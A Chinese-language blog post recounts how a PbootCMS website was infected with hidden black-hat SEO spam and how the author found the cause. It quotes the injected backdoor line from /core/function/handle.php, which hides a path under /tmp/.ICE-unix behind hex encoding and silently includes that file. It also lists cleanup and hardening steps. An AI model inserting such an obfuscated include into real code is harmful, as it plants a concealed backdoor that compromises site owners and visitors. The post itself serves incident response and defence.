pbootcms网站被黑记录及查找根源 /core/function/handle.php $runtime_dir = PACK('H*','2F746D702F2E
今天在群里看到看到群友说站被黑了。
查看了一下自己的站,也发现了异常。
几天收入量增加了两万
仔细看收入发现有很多。黑帽链接。
用站长工具查看。发现异常
代码的位置在模板的最上方。
所以排查的方向先从伪静态开始。
然后排查模板顶端。
然后再排查。Php入口文件。
都没有发现问题,那么就可能是在内核文件中
我先清理了备份文件,然后用工具查询了一下。
发现几个异常文件,然后逐一排查。
最后发现是这个文件的问题。
/core/function/handle.php
恶意代码
$runtime_dir = PACK('H*','2F746D702F2E4943452D756E69782F7169716930'); if(is_file($runtime_dir)){ @INCLUDE_ONCE($runtime_dir); }
用十六进制转换一下。
找到文件位置。删除,然后做好防护。
最终问题解决
最后的总结。这种情况在前台几乎无法查看,只有查看看百度的收录异常才能发现。你直接打开网页右键源码时看不到任何问题的。
或者是用站长工具模拟搜索引擎抓取查看,可以看到异常。
1 屏蔽IP18.162.98.238
2 服务器 /tmp/.ICE-unix 文件禁止写入
3 robots.txt禁止抓取
Disallow: *.asp
Disallow: /?*
Disallow: /app*
如果您的问题还未解决可以联系站长付费协助。
有问题可以加入技术QQ群一起交流学习
本站vip会员 请加入无忧模板网 VIP群(50604020) PS:加入时备注用户名或昵称
普通注册会员或访客 请加入无忧模板网 技术交流群(50604130)
客服微信号:15898888535
声明:本站所有文章资源内容,如无特殊说明或标注,均为采集网络资源。如若内容侵犯了原著者的合法权益,可联系站长删除。
